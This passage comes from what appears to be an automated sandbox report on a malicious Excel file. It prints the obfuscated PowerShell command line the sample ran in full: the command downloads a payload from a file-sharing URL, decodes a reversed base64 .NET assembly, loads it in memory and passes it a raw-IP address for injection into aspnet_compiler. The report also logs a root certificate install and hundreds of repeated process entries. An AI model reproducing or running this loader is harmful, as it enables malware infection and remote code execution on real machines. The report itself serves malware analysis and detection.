wIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE8999022D push eax; iretd 8_2_000007FE89990241
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899900BD pushad ; iretd 8_2_000007FE899900C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_000007FE89A91F15 push ss; retf 001Ah15_2_000007FE89A91F3A

      Persistence and Installation Behavior

      barindex
      Installs new ROOT certificates
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
